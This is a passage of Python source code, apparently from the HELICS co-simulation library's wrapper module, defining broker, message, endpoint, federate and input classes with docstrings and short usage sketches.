Returns: a string with the value requested. This is either going to be a vector of strings value or a JSON string stored in the first element of the vector. The string "#invalid" is returned if the query was not valid.
"""
q = helicsCreateQuery(target, query)
if mode != HelicsSequencingMode.FAST:
helicsQuerySetOrdering(q, mode)
result = helicsQueryBrokerExecute(q, self)
helicsQueryFree(q)
return result
def global_error(self, error_code: int, error_string: str):
"""
Generate a global error to terminate the federation.
**Parameters**
- **`error_code`**: an error code to give to the error.
- **`error_string`**: a string message associated with the error.
"""
helicsBrokerGlobalError(self, error_code, error_string)
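# Example (illustrative sketch): wiring interfaces and monitoring a federation through a
# HelicsBroker wrapper. The publication, input, filter, and endpoint names are hypothetical,
# and the broker would come from a broker creation helper defined elsewhere in this module.
def _example_wire_broker(broker):
    # Connect a named publication directly to a named input.
    broker.data_link("generator/power", "controller/power_in")
    # Route messages leaving an endpoint through an existing named filter.
    broker.add_source_filter_to_endpoint("delay_filter", "sender/out")
    broker.set_global("run_id", "42")
    # Ordered queries travel with normal message priority instead of the fast channel.
    return broker.query("federation", "federates", mode=HelicsSequencingMode.ORDERED)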
class _MessageFlagAccessor(_HelicsCHandle):
def __getitem__(self, index):
return helicsMessageGetFlagOption(HelicsMessage(self.handle, cleanup=False), index)
def __setitem__(self, index: int, value: bool):
return helicsMessageSetFlagOption(HelicsMessage(self.handle, cleanup=False), index, value)
def __repr__(self):
lst = []
for f in range(1, 16):
lst.append("{} = {}".format(f, self[f]))
return "<{{ {} }}>".format(", ".join(lst))
def __delitem__(self, index):
raise NotImplementedError("Cannot delete index: {}".format(index))
class HelicsMessage(_HelicsCHandle):
def __init__(self, handle, cleanup=True):
super(HelicsMessage, self).__init__(handle, cleanup=cleanup)
self.flag = _MessageFlagAccessor(self.handle, cleanup=False)
def __repr__(self):
source = self.source
destination = self.destination
original_source = self.original_source
original_destination = self.original_destination
time = self.time
message_id = self.message_id
message = self.data
return """<helics.{class_name}(source = "{source}", destination = "{destination}", original_source = "{original_source}", original_destination = "{original_destination}", time = {time}, id = {message_id}, message = "{message}") at {id}>""".format(
class_name=self.__class__.__name__,
source=source,
destination=destination,
original_source=original_source,
original_destination=original_destination,
time=time,
message_id=message_id,
message=message,
id=hex(id(self)),
)
def append(self, data: bytes):
helicsMessageAppendData(self, data)
def is_valid(self) -> bool:
return helicsMessageIsValid(self)
@property
def source(self):
return helicsMessageGetSource(self)
@source.setter
def source(self, v):
return helicsMessageSetSource(self, v)
@property
def destination(self):
return helicsMessageGetDestination(self)
@destination.setter
def destination(self, v):
return helicsMessageSetDestination(self, v)
@property
def original_source(self):
return helicsMessageGetOriginalSource(self)
@original_source.setter
def original_source(self, v):
return helicsMessageSetOriginalSource(self, v)
@property
def original_dest(self):
warnings.warn("This is deprecated. Use `original_destination` instead.")
return self.original_destination
@original_dest.setter
def original_dest(self, v):
warnings.warn("This is deprecated. Use `original_destination` instead.")
self.original_destination = v
@property
def original_destination(self):
return helicsMessageGetOriginalDestination(self)
@original_destination.setter
def original_destination(self, v):
return helicsMessageSetOriginalDestination(self, v)
@property
def time(self):
return helicsMessageGetTime(self)
@time.setter
def time(self, v):
return helicsMessageSetTime(self, v)
@property
def data(self):
return helicsMessageGetString(self)
@data.setter
def data(self, v: str):
return helicsMessageSetString(self, v)
@property
def raw_data(self) -> bytes:
return helicsMessageGetBytes(self)
@raw_data.setter
def raw_data(self, v: bytes):
return helicsMessageSetData(self, v)
@property
def message_id(self):
return helicsMessageGetMessageID(self)
@message_id.setter
def message_id(self, v):
return helicsMessageSetMessageID(self, v)
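# Example (illustrative sketch): filling in a HelicsMessage before it is sent. The message would
# normally come from HelicsEndpoint.create_message() below; the destination name and payload are
# hypothetical.
def _example_fill_message(msg, destination="controller/in"):
    msg.destination = destination
    msg.data = '{"setpoint": 1.05}'   # string payload; raw bytes go through raw_data instead
    msg.time = 1.0                    # requested delivery time in simulation units
    msg.message_id = 7
    return msg.is_valid()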
class HelicsQuery(_HelicsCHandle):
pass
class HelicsEndpoint(_HelicsCHandle):
def __repr__(self):
name = self.name
type = self.type
info = self.info
is_valid = self.is_valid()
default_destination = self.default_destination
n_pending_messages = self.n_pending_messages
return """<helics.{class_name}(name = "{name}", type = "{type}", info = "{info}", is_valid = {is_valid}, default_destination = "{default_destination}", n_pending_messages = {n_pending_messages}) at {id}>""".format(
class_name=self.__class__.__name__,
name=name,
type=type,
info=info,
is_valid=is_valid,
default_destination=default_destination,
n_pending_messages=n_pending_messages,
id=hex(id(self)),
)
@property
def default_destination(self) -> str:
"""Get the default destination for an endpoint."""
return helicsEndpointGetDefaultDestination(self)
@default_destination.setter
def default_destination(self, destination: str):
"""set the default destination for an endpoint."""
helicsEndpointSetDefaultDestination(self, destination)
@property
def n_pending_messages(self) -> int:
"""Returns the number of pending receives for endpoint."""
return helicsEndpointPendingMessageCount(self)
@property
def name(self) -> str:
"""Get the name of the endpoint."""
return helicsEndpointGetName(self)
@property
def type(self) -> str:
"""Get the specified type of the endpoint."""
return helicsEndpointGetType(self)
@property
def info(self) -> str:
"""Get the interface information field of the filter."""
return helicsEndpointGetInfo(self)
@info.setter
def info(self, info: str):
"""Set the interface information field of the filter."""
helicsEndpointSetInfo(self, info)
def is_valid(self) -> bool:
"""Check if the input is valid."""
return helicsEndpointIsValid(self)
def has_message(self) -> bool:
"""Checks if endpoint has unread messages."""
return helicsEndpointHasMessage(self)
def get_message(self) -> HelicsMessage:
"""Get a packet from an endpoint."""
return helicsEndpointGetMessage(self)
def create_message(self) -> HelicsMessage:
"""Create a message object."""
return helicsEndpointCreateMessage(self)
def send_data(self, data: Union[bytes, HelicsMessage], destination: str = None, time=None):
if type(data) == HelicsMessage:
helicsEndpointSendMessage(self, data)
elif time is None:
helicsEndpointSendBytesTo(self, data, destination)
else:
helicsEndpointSendBytesToAt(self, data, destination, time)
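# Example (illustrative sketch): draining and acknowledging messages on a HelicsEndpoint. The
# endpoint would come from an endpoint registration helper defined elsewhere in this module;
# the reply payload is hypothetical.
def _example_drain_endpoint(endpoint):
    replies = 0
    while endpoint.has_message():
        msg = endpoint.get_message()
        # Echo an acknowledgement back to wherever the message came from.
        endpoint.send_data(b"ack:" + msg.raw_data, destination=msg.source)
        replies += 1
    return replies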
class _FederateInfoFlagAccessor(_HelicsCHandle):
def __getitem__(self, index):
raise AttributeError("Unable to get {index}".format(index=index))
def __setitem__(self, index, value):
if type(index) == str:
idx = helicsGetFlagIndex(index)
else:
try:
idx = HelicsFlag(index)
except Exception as _:
idx = HelicsFederateFlag(index)
return helicsFederateInfoSetFlagOption(self, idx, value)
def __delitem__(self, index):
raise NotImplementedError("Cannot delete index: {}".format(index))
class _FederateInfoPropertyAccessor(_HelicsCHandle):
def __getitem__(self, index):
raise AttributeError("Unable to get {index}".format(index=index))
def __setitem__(self, index, value):
if type(index) == str:
idx = helicsGetPropertyIndex(index)
else:
idx = HelicsProperty(index)
if "TIME_" in idx.name:
return helicsFederateInfoSetTimeProperty(self, idx, value)
elif "INT_" in idx.name:
            return helicsFederateInfoSetIntegerProperty(self, idx, value)
def __repr__(self):
lst = []
for p in HelicsProperty:
lst.append("'{}' = {}".format(p.name, self[p]))
return "<{{ {} }}>".format(", ".join(lst))
def __delitem__(self, index):
raise NotImplementedError("Cannot delete index: {}".format(index))
class HelicsFederateInfo(_HelicsCHandle):
def __init__(self, handle):
# Python2 compatible super
super(HelicsFederateInfo, self).__init__(handle)
self.property = _FederateInfoPropertyAccessor(self.handle, cleanup=False)
self.flag = _FederateInfoFlagAccessor(self.handle, cleanup=False)
def __repr__(self):
return """<helics.{class_name}() at {id}>""".format(
class_name=self.__class__.__name__,
id=hex(id(self)),
)
@property
def core_name(self):
raise AttributeError("Unreadable attribute `core_name`")
@core_name.setter
def core_name(self, core_name: str):
helicsFederateInfoSetCoreName(self, core_name)
@property
def separator(self):
raise AttributeError("Unreadable attribute `separator`")
@separator.setter
def separator(self, separator: str):
"""
Specify a separator to use for naming separation between the federate name and the interface name.
`self.separator = '.'` will result in future registrations of local endpoints such as `"fedName.endpoint"`.
`self.separator = '/'` will result in `"fedName/endpoint"`.
The default is `'/'`.
Any character can be used though many will not make that much sense.
        This call is not thread safe and should be called before any local interfaces are created; otherwise it may not be possible to retrieve them without using the full name.
Recommended: ['/', '.', ':', '-', '_']
"""
helicsFederateInfoSetSeparator(self, separator)
@property
def core_init(self):
raise AttributeError("Unreadable attribute `core_init`")
@core_init.setter
def core_init(self, core_init: str):
"""
Set the core init string to use in the FederateInfo.
**`core_init`**: core init string to use.
"""
helicsFederateInfoSetCoreInitString(self, core_init)
@property
def broker_init(self):
raise AttributeError("Unreadable attribute `broker_init`")
@broker_init.setter
def broker_init(self, broker_init: str):
"""Set a string for the broker initialization in command line argument format."""
helicsFederateInfoSetBrokerInitString(self, broker_init)
@property
def core_type(self):
raise AttributeError("Unreadable attribute `core_type`")
@core_type.setter
def core_type(self, core_type):
"""
        Set the core type.
        **Parameters**
        - **`core_type`**: a core type, given as a string or a `HelicsCoreType` member.
"""
if type(core_type) == str:
helicsFederateInfoSetCoreTypeFromString(self, core_type)
else:
helicsFederateInfoSetCoreType(self, HelicsCoreType(core_type))
@property
def broker(self):
raise AttributeError("Unreadable attribute `broker`.")
@broker.setter
def broker(self, broker: str):
"""
Set the broker to connect with.
**`broker`**: a string with the broker connection information or name.
"""
helicsFederateInfoSetBroker(self, broker)
@property
def broker_key(self):
raise AttributeError("Unreadable attribute `broker_key`.")
@broker_key.setter
def broker_key(self, broker_key):
"""Set the broker name to use.
**`broker_key`**: a string with the broker name information
"""
helicsFederateInfoSetBrokerKey(self, broker_key)
@property
def local_port(self):
raise AttributeError("Unreadable attribute `local_port`.")
@local_port.setter
def local_port(self, broker_port: int):
helicsFederateInfoSetLocalPort(self, broker_port)
@property
def broker_port(self):
raise AttributeError("Unreadable attribute `broker_port`.")
@broker_port.setter
def broker_port(self, broker_port: int):
helicsFederateInfoSetBrokerPort(self, broker_port)
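# Example (illustrative sketch): configuring a HelicsFederateInfo before it is used to build a
# federate. The object itself would come from the federate-info creation helper defined
# elsewhere in this module; the core name, init string, broker address, and chosen values are
# hypothetical.
def _example_configure_fedinfo(fi):
    fi.core_name = "example_core"
    fi.core_type = "zmq"              # strings or HelicsCoreType members are both accepted
    fi.core_init = "--federates=1"
    fi.broker = "tcp://127.0.0.1:23405"
    fi.property[HELICS_PROPERTY_TIME_DELTA] = 0.01
    fi.flag[HELICS_FLAG_TERMINATE_ON_ERROR] = True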
class _PublicationOptionAccessor(_HelicsCHandle):
def __getitem__(self, index):
if type(index) == str:
idx = helicsGetOptionIndex(index)
else:
idx = HelicsHandleOption(index)
return helicsPublicationGetOption(self, idx)
def __setitem__(self, index, value):
if type(index) == str:
idx = helicsGetOptionIndex(index)
else:
idx = HelicsHandleOption(index)
return helicsPublicationSetOption(self, idx, value)
def __repr__(self):
lst = []
for o in HelicsHandleOption:
lst.append("'{}' = {}".format(o.name, self[o]))
return "<{{ {} }}>".format(", ".join(lst))
def __delitem__(self, index):
raise NotImplementedError("Cannot delete index: {}".format(index))
class _FederateFlagAccessor(_HelicsCHandle):
def __getitem__(self, index):
if type(index) == str:
idx = helicsGetFlagIndex(index)
else:
try:
idx = HelicsFlag(index)
except Exception as _:
idx = HelicsFederateFlag(index)
return helicsFederateGetFlagOption(self, idx)
def __setitem__(self, index, value):
if type(index) == str:
idx = helicsGetFlagIndex(index)
else:
try:
idx = HelicsFlag(index)
except Exception as _:
idx = HelicsFederateFlag(index)
return helicsFederateSetFlagOption(self, idx, value)
def __repr__(self):
lst = []
for f in HelicsFlag:
try:
lst.append("'{}' = {}".format(f.name, self[f]))
except Exception as _:
pass
for f in HelicsFederateFlag:
try:
lst.append("'{}' = {}".format(f.name, self[f]))
except Exception as _:
pass
return "<{{ {} }}>".format(", ".join(lst))
def __delitem__(self, index):
raise NotImplementedError("Cannot delete index: {}".format(index))
class _FederatePropertyAccessor(_HelicsCHandle):
def __getitem__(self, index):
if type(index) == str:
idx = helicsGetPropertyIndex(index)
else:
idx = HelicsProperty(index)
if "TIME_" in idx.name:
return helicsFederateGetTimeProperty(self, idx)
elif "INT_" in idx.name:
return helicsFederateGetIntegerProperty(self, idx)
def __setitem__(self, index, value):
if type(index) == str:
idx = helicsGetPropertyIndex(index)
else:
idx = HelicsProperty(index)
if "TIME_" in idx.name:
return helicsFederateSetTimeProperty(self, idx, value)
elif "INT_" in idx.name:
            return helicsFederateSetIntegerProperty(self, idx, value)
def __repr__(self):
lst = []
for p in HelicsProperty:
lst.append("'{}' = {}".format(p.name, self[p]))
return "<{{ {} }}>".format(", ".join(lst))
def __delitem__(self, index):
raise NotImplementedError("Cannot delete index: {}".format(index))
class HelicsFederate(_HelicsCHandle):
def __init__(self, handle):
# Python2 compatible super
super(HelicsFederate, self).__init__(handle)
self._exec_async_iterate = False
self.property = _FederatePropertyAccessor(self.handle, cleanup=False)
self.flag = _FederateFlagAccessor(self.handle, cleanup=False)
self._separator = "/"
self.publications = {}
self.subscriptions = {}
self.endpoints = {}
self.filters = {}
def __repr__(self):
name = self.name
state = str(self.state)
current_time = self.current_time
n_publications = self.n_publications
n_endpoints = self.n_endpoints
n_filters = self.n_filters
n_subscriptions = self.n_inputs
n_pending_messages = self.n_pending_messages
return """<helics.{class_name}(name = "{name}", state = {state}, current_time = {current_time}, n_publications = {n_publications}, n_subscriptions = {n_subscriptions}, n_endpoints = {n_endpoints}, n_filters = {n_filters}, n_pending_messages = {n_pending_messages}) at {id}>""".format(
class_name=self.__class__.__name__,
name=name,
state=state,
current_time=current_time,
n_publications=n_publications,
n_endpoints=n_endpoints,
n_filters=n_filters,
n_subscriptions=n_subscriptions,
n_pending_messages=n_pending_messages,
id=hex(id(self)),
)
@property
def name(self) -> str:
return helicsFederateGetName(self)
@property
def state(self) -> HelicsFederateState:
return helicsFederateGetState(self)
@property
def current_time(self) -> HelicsTime:
return helicsFederateGetCurrentTime(self)
@property
def core(self) -> HelicsCore:
return helicsFederateGetCore(self)
@property
def n_publications(self) -> int:
return helicsFederateGetPublicationCount(self)
@property
def n_endpoints(self) -> int:
return helicsFederateGetEndpointCount(self)
@property
def n_filters(self) -> int:
return helicsFederateGetFilterCount(self)
@property
def n_inputs(self) -> int:
return helicsFederateGetInputCount(self)
@property
def n_pending_messages(self):
"""Returns the number of pending receives for all endpoints."""
return helicsFederatePendingMessageCount(self)
@property
def separator(self):
return self._separator
@separator.setter
def separator(self, separator: str):
"""
Specify a separator to use for naming separation between the federate name and the interface name.
`self.separator = '.'` will result in future registrations of local endpoints such as `"fedName.endpoint"`.
`self.separator = '/'` will result in `"fedName/endpoint"`.
The default is `'/'`.
Any character can be used though many will not make that much sense.
        This call is not thread safe and should be called before any local interfaces are created; otherwise it may not be possible to retrieve them without using the full name.
Recommended: ['/', '.', ':', '-', '_']
**Parameters**
- **separator**: str to use as separator.
"""
helicsFederateSetSeparator(self, separator)
self._separator = separator
def register_interfaces(self, config):
"""
Register a set of interfaces defined in a file.
        The call is only valid in startup mode.
        **Parameters**
        - **`config`**: the location of the file or config string to load to generate the interfaces.
"""
helicsFederateRegisterInterfaces(self, config)
def enter_initializing_mode(self):
"""
Enter the initialization mode after all interfaces have been defined.
The call will block until all federates have entered initialization mode.
"""
helicsFederateEnterInitializingMode(self)
def enter_initializing_mode_async(self):
"""
Enter the initialization mode after all interfaces have been defined.
The call will not block but a call to `enter_initializing_mode_complete` should be made to complete the call sequence.
"""
helicsFederateEnterInitializingModeAsync(self)
def is_async_operation_completed(self):
"""
Called after one of the async calls and will indicate true if an async operation has completed.
        Only call from the same thread as the one that made the initial async call; it will return false if called when no async operation is in flight.
"""
return helicsFederateIsAsyncOperationCompleted(self)
def enter_initializing_mode_complete(self):
"""
        Second part of the async process for entering the initialization state. Call this after a call to `enter_initializing_mode_async`; if called at any other time it will throw an `InvalidFunctionCall` exception.
"""
helicsFederateEnterInitializingModeComplete(self)
def enter_executing_mode(self, iterate: HelicsIterationRequest = HelicsIterationRequest.NO_ITERATION):
"""
Enter the normal execution mode.
Call will block until all federates have entered this mode.
**Parameters**
- **`iterate`**: An optional flag indicating the desired iteration mode.
"""
iterate = HelicsIterationRequest(iterate)
if iterate == HelicsIterationRequest.NO_ITERATION:
helicsFederateEnterExecutingMode(self)
out_iterate = HelicsIterationResult.NEXT_STEP
else:
out_iterate = helicsFederateEnterExecutingModeIterative(self, iterate)
return out_iterate
def enter_executing_mode_async(self, iterate: HelicsIterationRequest = HelicsIterationRequest.NO_ITERATION):
"""
Enter the normal execution mode.
Call will return immediately but `enter_executing_mode_complete` should be called to complete the operation.
**Parameters**
- **`iterate`**: An optional flag indicating the desired iteration mode.
"""
iterate = HelicsIterationRequest(iterate)
if iterate == HelicsIterationRequest.NO_ITERATION:
helicsFederateEnterExecutingModeAsync(self)
self._exec_async_iterate = False
else:
helicsFederateEnterExecutingModeIterativeAsync(self, iterate)
self._exec_async_iterate = True
def enter_executing_mode_complete(self):
"""
Complete the async call for entering Execution state.
Call will not block but will return quickly.
        A call to `enter_executing_mode_async` must have been made before calling this function.
"""
out_iterate = HelicsIterationResult.NEXT_STEP
if self._exec_async_iterate:
out_iterate = helicsFederateEnterExecutingModeIterativeComplete(self)
else:
helicsFederateEnterExecutingModeComplete(self)
return out_iterate
def disconnect(self):
"""
Terminate the simulation.
        The call will block until the disconnect has been acknowledged; no commands that interact with the core may be called after this function.
"""
helicsFederateDisconnect(self)
def disconnect_async(self):
"""
Terminate the simulation in a non-blocking call.
`self.disconnect_complete()` must be called after this call to complete the disconnect procedure.
"""
helicsFederateDisconnectAsync(self)
def disconnect_complete(self):
"""
Complete the asynchronous terminate pair.
"""
helicsFederateDisconnectComplete(self)
def finalize(self):
"""
Terminate the simulation.
The call will block until the finalize has been acknowledged; no commands that interact with the core may be called after this function.
**DEPRECATED**
"""
warnings.warn("This function is deprecated. Use the `HelicsFederate.disconnect` function instead.")
helicsFederateFinalize(self)
def finalize_async(self):
"""
Terminate the simulation in a non-blocking call.
`self.finalize_complete()` must be called after this call to complete the finalize procedure.
**DEPRECATED**
"""
warnings.warn("This function is deprecated. Use the `HelicsFederate.disconnect_async` function instead.")
helicsFederateFinalizeAsync(self)
def finalize_complete(self):
"""
Complete the asynchronous terminate pair.
**DEPRECATED**
"""
warnings.warn("This function is deprecated. Use the `HelicsFederate.disconnect_complete` function instead.")
helicsFederateFinalizeComplete(self)
def request_time(self, time: HelicsTime) -> HelicsTime:
"""
Request a time advancement to the specified time.
**Parameters**
- **`time`**: the next requested time step.
Returns: the granted time step.
"""
return helicsFederateRequestTime(self, time)
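# Illustrative usage sketch (not part of the HELICS API): a typical co-simulation
# time loop built on `request_time`. The stop time and step values are hypothetical.
def _sketch_time_loop(fed, stop_time=10.0, step=1.0):
    granted = 0.0
    while granted < stop_time:
        # Block until the federation grants a time at or before the request.
        granted = fed.request_time(granted + step)
    fed.disconnect()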
def request_next_step(self) -> HelicsTime:
"""
Request a time advancement to the next allowed time.
Returns: The granted time step.
"""
return helicsFederateRequestNextStep(self)
def request_time_advance(self, time_delta: HelicsTime) -> HelicsTime:
"""
Request a time advancement by a specified amount of time.
**Parameters**
- **`time_delta`**: the amount of time requested to advance.
Returns: The granted time step.
"""
return helicsFederateRequestTimeAdvance(self, time_delta)
def request_time_iterative(self, time: float, iterate: HelicsIterationRequest) -> Tuple[HelicsTime, HelicsIterationResult]:
"""
Request a time advancement.
**Parameters**
- **`time`**: the next requested time step.
- **`iterate`**: a requested iteration mode.
Returns: a tuple containing the granted time and an iteration result.
"""
grantedTime, status = helicsFederateRequestTimeIterative(self, time, iterate)
return grantedTime, status
def request_time_async(self, time: HelicsTime):
"""
Request a time advancement and return immediately for asynchronous function.
`self.request_time_complete()` should be called to finish the operation and get the result.
**Parameters**
- **`time`**: the next requested time step
"""
helicsFederateRequestTimeAsync(self, time)
def request_time_iterative_async(self, time: float, iterate: HelicsIterationRequest):
"""
Request a time advancement with iterative call and return for asynchronous function.
`self.request_time_iterative_complete()` should be called to finish the operation and get the result.
**Parameters**
- **`time`**: the next requested time step.
- **`iterate`**: a requested iteration level (none, require, optional).
"""
helicsFederateRequestTimeIterativeAsync(self, time, iterate)
def request_time_complete(self) -> HelicsTime:
"""
Request a time advancement.
Returns: the granted time step.
"""
return helicsFederateRequestTimeComplete(self)
def request_time_iterative_complete(self) -> Tuple[HelicsTime, HelicsIterationResult]:
"""
Finalize the time advancement request.
Returns: the granted time step and iteration result.
"""
granted_time, status = helicsFederateRequestTimeIterativeComplete(self)
return granted_time, status
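# Illustrative usage sketch (not part of the HELICS API): requesting time with
# iterations asynchronously. `HelicsIterationRequest.ITERATE_IF_NEEDED` is assumed
# to be a member of the iteration-request enum used elsewhere in this module.
def _sketch_iterative_request(fed, next_time):
    fed.request_time_iterative_async(next_time, HelicsIterationRequest.ITERATE_IF_NEEDED)
    # Do other work here, then collect the granted time and iteration status.
    granted, status = fed.request_time_iterative_complete()
    return granted, status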
def query(self, target: str, query: str) -> JSONType:
"""
Make a query of the federate.
This call blocks until the value is returned, which may take some time depending on the size of the federation and the specific string being queried.
**Parameters**
- **`target`**: the target of the query can be "federation", "federate", "broker", "core", or a specific name of a federate, core, or broker.
- **`query`**: a string with the query see other documentation for specific properties to query, can be defined by the federate.
Returns: the query result, typically a JSON value (list, dict, or string) depending on the query.
The string "#invalid" is returned if the query was not valid.
"""
q = helicsCreateQuery(target, query)
result = helicsQueryExecute(q, self)
helicsQueryFree(q)
return result
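# Illustrative usage sketch (not part of the HELICS API): querying the federation
# for the list of federate names. "federation"/"federates" follow the standard
# HELICS query conventions; the exact result shape depends on the federation.
def _sketch_query_federates(fed):
    # Returns a parsed JSON value (often a list of names) or "#invalid".
    return fed.query("federation", "federates")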
def register_filter(self, kind: HelicsFilterType, filter_name: str) -> HelicsFilter:
"""
Define a filter interface.
A filter will modify messages coming from or going to target endpoints.
**Parameters**
- **`kind`**: the type of the filter to register.
- **`filter_name`**: the name of the filter.
"""
filter = helicsFederateRegisterFilter(self, kind, filter_name)
self.filters[filter.name] = filter
return filter
def register_cloning_filter(self, delivery_endpoint: str) -> HelicsCloningFilter:
"""
Create a `HelicsCloningFilter` on the specified federate.
Cloning filters copy a message and send it to multiple locations; source and destination targets can be added through other functions.
**Parameters**
- **`delivery_endpoint`**: the specified endpoint to deliver the message.
Returns: A `HelicsCloningFilter` object.
"""
filter = helicsFederateRegisterCloningFilter(self, delivery_endpoint)
self.filters[filter.name] = filter
return filter
def register_global_filter(self, kind: HelicsFilterType, filter_name: str) -> HelicsFilter:
"""
Define a filter interface.
A filter will modify messages coming from or going to target endpoints.
**Parameters**
- **`kind`**: the type of the filter to register.
- **`filter_name`**: the name of the filter.
"""
filter = helicsFederateRegisterGlobalFilter(self, kind, filter_name)
self.filters[filter.name] = filter
return filter
def register_global_cloning_filter(self, delivery_endpoint: str) -> HelicsCloningFilter:
"""
Create a global cloning filter on the specified federate.
Cloning filters copy a message and send it to multiple locations; source and destination targets can be added through other functions.
**Parameters**
- **`delivery_endpoint`**: the specified endpoint to deliver the message.
Returns: A CloningFilter object.
"""
filter = helicsFederateRegisterGlobalCloningFilter(self, delivery_endpoint)
self.filters[filter.name] = filter
return filter
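# Illustrative usage sketch (not part of the HELICS API): registering a delay filter
# and a cloning filter. `HelicsFilterType.DELAY` is assumed to be a member of the
# filter-type enum; "recorder/in" is a hypothetical delivery endpoint name.
def _sketch_filters(fed):
    delay_filter = fed.register_filter(HelicsFilterType.DELAY, "delay_filter")
    clone_filter = fed.register_cloning_filter("recorder/in")
    return delay_filter, clone_filter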
def get_filter_by_name(self, filter_name):
"""
Get a filter from its name.
**Parameters**
- **`filter_name`**: the name of the filter.
Returns: a reference to a filter object which could be invalid if `filter_name` is not valid.
"""
return helicsFederateGetFilter(self, filter_name)
def get_filter_by_index(self, filter_index):
"""
Get a filter by index.
**Parameters**
- **`filter_index`**: the index of a filter.
Returns: a reference to a filter object which could be invalid if the index is not valid.
"""
return helicsFederateGetFilterByIndex(self, filter_index)
def set_global(self, name: str, value: str):
"""
Set a federation global value.
This overwrites any previous value for this name.
**Parameters**
- **`name`**: the name of the global to set.
- **`value`**: the value of the global.
"""
helicsFederateSetGlobal(self, name, value)
def add_dependency(self, federate_name):
"""
Add a dependency for this federate.
Adds an additional internal time dependency for the federate.
**Parameters**
- **`federate_name`**: the name of the federate to add a dependency on.
"""
helicsFederateAddDependency(self, federate_name)
def local_error(self, error_code: int, error_string: str):
"""
Generate a local federate error.
**Parameters**
- **`error_code`**: an error code to give to the error.
- **`error_string`**: a string message associated with the error.
"""
helicsFederateLocalError(self, error_code, error_string)
def global_error(self, error_code: int, error_string: str):
"""
Generate a global error to terminate the federation.
**Parameters**
- **`error_code`**: an error code to give to the error.
- **`error_string`**: a string message associated with the error.
"""
helicsFederateGlobalError(self, error_code, error_string)
def log_message(self, message: str, level: HelicsLogLevel):
"""Log an message."""
if level == logging.ERROR:
helicsFederateLogErrorMessage(self, message)
elif level == logging.WARN:
helicsFederateLogWarningMessage(self, message)
elif level == logging.INFO:
helicsFederateLogInfoMessage(self, message)
elif level == logging.DEBUG:
helicsFederateLogDebugMessage(self, message)
else:
helicsFederateLogLevelMessage(self, HelicsLogLevel(level), message)
class _InputOptionAccessor(_HelicsCHandle):
def __getitem__(self, index):
if type(index) == str:
idx = helicsGetOptionIndex(index)
else:
idx = HelicsHandleOption(index)
return helicsInputGetOption(self, idx)
def __setitem__(self, index, value):
if type(index) == str:
idx = helicsGetOptionIndex(index)
else:
idx = HelicsHandleOption(index)
return helicsInputSetOption(self, idx, value)
def __repr__(self):
lst = []
for o in HelicsHandleOption:
lst.append("'{}' = {}".format(o.name, self[o]))
return "<{{ {} }}>".format(", ".join(lst))
def __delitem__(self, index):
raise NotImplementedError("Cannot delete index: {}".format(index))
class HelicsInput(_HelicsCHandle):
def __init__(self, handle):
super(HelicsInput, self).__init__(handle, cleanup=False)
self.option = _InputOptionAccessor(self.handle, cleanup=False)
def __repr__(self):
name = self.name
units = self.units
injection_units = self.injection_units
publication_type = self.publication_type
type = self.type
target = self.target
info = self.info
return """<helics.{class_name}(name = "{name}", units = "{units}", injection_units = "{injection_units}", publication_type = "{publication_type}", type = "{type}", target = "{target}", info = "{info}") at {id}>""".format(
class_name=self.__class__.__name__,
name=name,
units=units,
injection_units=injection_units,
publication_type=publication_type,
type=type,
target=target,
info=info,
id=hex(id(self)),
)
def is_valid(self) -> bool:
"""Check if the input is valid."""
return helicsInputIsValid(self)
def add_target(self, target: str):
"""Add a publication target to the input."""
helicsInputAddTarget(self, target)
def set_default(self, data: Union[bytes, str, int, bool, float, complex, List[float]]):
"""
Set the default value used before any value has been published.
The value may be raw bytes, a string, an integer, a boolean, a double, a complex number, or a list of doubles.
"""
if isinstance(data, bytes):
helicsInputSetDefaultBytes(self, data)
elif isinstance(data, str):
helicsInputSetDefaultString(self, data)
elif isinstance(data, bool):
# bool must be checked before int because bool is a subclass of int
helicsInputSetDefaultBoolean(self, data)
elif isinstance(data, int):
helicsInputSetDefaultInteger(self, data)
elif isinstance(data, float):
helicsInputSetDefaultDouble(self, data)
elif isinstance(data, complex):
helicsInputSetDefaultComplex(self, data.real, data.imag)
elif isinstance(data, list):
helicsInputSetDefaultVector(self, data)
else:
raise NotImplementedError("Unknown type `{}`".format(type(data)))
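# Illustrative usage sketch (not part of the HELICS API): giving a subscription a
# default so reads before the first publication return something sensible. Assumes
# `fed` is a HelicsValueFederate; the key "sender/voltage" is hypothetical.
def _sketch_default_value(fed):
    sub = fed.register_subscription("sender/voltage", units="V")
    sub.set_default(0.0)  # used until a value is actually published
    return sub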
@property
def value(self) -> Union[bytes, str, int, bool, float, complex, Tuple, List[float]]:
if self.publication_type == "bytes":
return self.bytes
elif self.publication_type == "string":
return self.string
elif self.publication_type == "integer":
return self.integer
elif self.publication_type == "boolean":
return self.boolean
elif self.publication_type == "double":
return self.double
elif self.publication_type == "complex":
return self.complex
elif self.publication_type == "vector":
return self.vector
elif self.publication_type == "named_point":
return self.named_point
else:
warnings.warn("Unknown publication type `{}`. Defaulting to string.".format(self.publication_type))
return self.string
@property
def bytes(self) -> bytes:
"""Get a raw value as a character vector."""
return helicsInputGetBytes(self)
@property
def string(self) -> str:
"""Get the current value as a string."""
return helicsInputGetString(self)
@property
def named_point(self) -> Tuple[str, float]:
"""Get the current value as a named point."""
return helicsInputGetNamedPoint(self)
@property
def integer(self) -> int:
"""Get the current value as a 64 bit integer."""
return helicsInputGetInteger(self)
@property
def boolean(self) -> bool:
"""Get the value as a boolean."""
return helicsInputGetBoolean(self)
@property
def double(self) -> float:
"""Get the value as a double."""
return helicsInputGetDouble(self)
@property
def complex(self) -> complex:
"""Get the value as a complex number."""
with warnings.catch_warnings():
warnings.simplefilter("ignore")
r, i = helicsInputGetComplex(self)
return complex(r, i)
@property
def vector(self) -> List[float]:
"""get the current value as a vector of doubles."""
return helicsInputGetVector(self)
def is_updated(self) -> bool:
"""Check if an input is updated."""
return helicsInputIsUpdated(self)
def get_last_update_time(self) -> HelicsTime:
"""Get the last time an input was updated."""
return helicsInputLastUpdateTime(self)
def clear_update(self):
"""Clear the updated flag."""
helicsInputClearUpdate(self)
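# Illustrative usage sketch (not part of the HELICS API): reading an input only
# when it has been updated since the last read. Assumes `sub` is a HelicsInput
# obtained from a value federate.
def _sketch_read_if_updated(sub):
    if sub.is_updated():
        value = sub.value  # dispatches on the publication type
        sub.clear_update()
        return value
    return None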
@property
def key(self) -> str:
"""
Get the name/key for the input.
The name is the local name if given; the key is the full key name.
**DEPRECATED**
"""
warnings.warn("This function is deprecated. Use the `HelicsInput.name` attribute instead.")
return helicsInputGetKey(self)
@property
def name(self) -> str:
"""
Get the name/key for the input.
